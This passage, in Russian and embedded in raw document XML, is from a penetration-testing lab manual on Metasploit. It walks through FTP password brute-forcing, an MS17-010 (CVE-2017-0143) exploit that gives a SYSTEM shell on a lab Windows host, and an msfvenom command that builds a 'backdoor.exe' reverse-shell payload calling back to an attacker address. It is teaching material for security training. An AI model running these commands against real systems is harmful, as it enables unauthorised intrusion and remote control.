          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse shell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93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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Возможные сценарии постэксплуатации ограничивают выбор оболочки. Если требуется управлять удаленным узлом, целесообразнее использовать VNC вместо консольной оболочки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000094">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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Учитывать ограничения атаки: требование быть незаметными, получить максимальные возможности, залить эксплоит или организовать туннель.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">В большинстве практических сценариев пентеста используется оболочка meterpreter как наиболее функциональная.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000096">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9bq3l7urtxbr" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Практическая часть</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000097">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_keqnvc4ihw9s" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание 1. Провести атаку подбора параметров подключения к ftp-серверу при помощи auxiliary-модуля </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Допустим, в результате разведки на удаленном ПК обнаружен работающий ftp-сервер. Подберем к нему пароль, зная имя пользователя. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000099">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Выбираем модуль командой </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use scanner/ftp/ftp_login.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Затем задаем у модуля ряд параметров:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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819775" cy="1171575"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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1171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both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Теперь командой </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set PASS_FILE /root/passlist_ftp_test.txt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">задаем путь к файлу, который содержит список паролей. В итоге получаем:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6121400" cy="2809240"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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2809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both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">После всех настроек можно запустить атаку командой </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Успешный результат атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009E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812147" cy="975409"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="36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2147" cy="9754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both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Теперь можно проверить найденные данные, подключившись к серверу по </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp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A0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6121400" cy="1773555"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="37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7735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Style w:val="Heading2"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2mzyp5qsdd18" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание 2. Эксплуатация уязвимости на удаленном ПК </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Применим</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> эксплоит для уязвимости CVE-2017-0143, которую использовал вирус WannaCry. Эта уязвимость присутствует почти во всех версиях Windows. Проверить ее наличие можно командой </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap --script smb-vuln-ms17-010.nse 192.168.56.102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в которой:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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--script</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это задание скрипта;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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smb-vuln-ms17-010.nse</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — имя скрипта для поиска уязвимости по идентификатору бюллетеня Microsoft (ms17-010);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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192.168.56.102</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — адрес для сканирования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Результат:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A7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255840" cy="1543494"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="38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5840" cy="15434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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Когда определили, что цель уязвима, можно провести атаку. Найдем все модули Metasploit для уязвимости при помощи команды </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">search cve:CVE-2017-0143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A9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6166018" cy="1804393"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="39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66018" cy="18043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both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Видим, что есть и модули для сканирования (auxiliary), и конкретные эксплоиты. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Выбираем эксплоит и смотрим его параметры:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6137229" cy="2442158"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="40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7229" cy="24421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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Можно просмотреть информацию об эксплоите при помощи команды </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">info. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Необходимо как минимум задать параметр, отвечающий за адрес удаленного хоста — он не задан по умолчанию. Для этого, находясь в меню используемого эксплоита, применяют команду </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set RHOST 192.168.56.102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AE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">В этой команде:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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set</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — имя команды;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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RHOST</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — имя параметра (чувствительно к регистру);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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192.168.56.102</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — значение параметра.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6121400" cy="497205"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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972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Чтобы снять значения параметра, используется команда </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unset.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Посмотрим, какие виды payload может применить Metasploit к выбранному эксплоиту при помощи команды </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">show payloads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B5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6121400" cy="1468120"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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468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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Теперь можно установить значение payload при помощи команды </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set payload windows/shell_bind_tcp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B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6121400" cy="719455"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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7194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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Запускаем эксплоит при помощи команды </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit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B9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106457" cy="3306483"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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6457" cy="33064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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Получили шелл на удаленном ПК (ОС Windows Server 2008R2), </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">причем с правами учетной записи «System»</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, которая обла дает наибольшими привилегиями в системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Далее необходимо закрепиться в системе и выполнить постэксплуатацию. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_uv75fu1zzwm8" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание 3. Запуск reverse-шелла на базе meterpreter и подключение к хендлеру в msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">При</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> пентесте бывают ситуации, в которых способ из задания 2 работать не будет. Например, если межсетевой экран блокирует входящие подключения к уязвимому узлу. В этом случае можно воспользоваться тем, что исходящий трафик обычно не фильтруется межсетевым экраном. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Необходимо использовать логику Reverse shell: запустить на уязвимом узле приложение, которое подключается к порту на узле злоумышленника. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BF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Создадим файл, который будет содержать нужный payload. Для этого воспользуемся утилитой </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> и следующей командой:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.103 lport=4444 -f exe -o backdoor.exe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1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="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-p windows/meterpreter/reverse_tcp </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — выбираем payload;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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lhost=192.168.56.103</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — указываем адрес для подключения. Это адрес, на котором прослушивается соединение. В нашем случае — адрес Kali linux;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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lport=4444</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — указываем порт для подключения, его надо открыть на Kali Linux;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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-f exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — выходной формат файла, у нас </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exe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C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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-o backdoor.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — путь к файлу для сохранения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Результат команды:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6121400" cy="887095"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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8870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both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Далее файл </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">backdoor.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
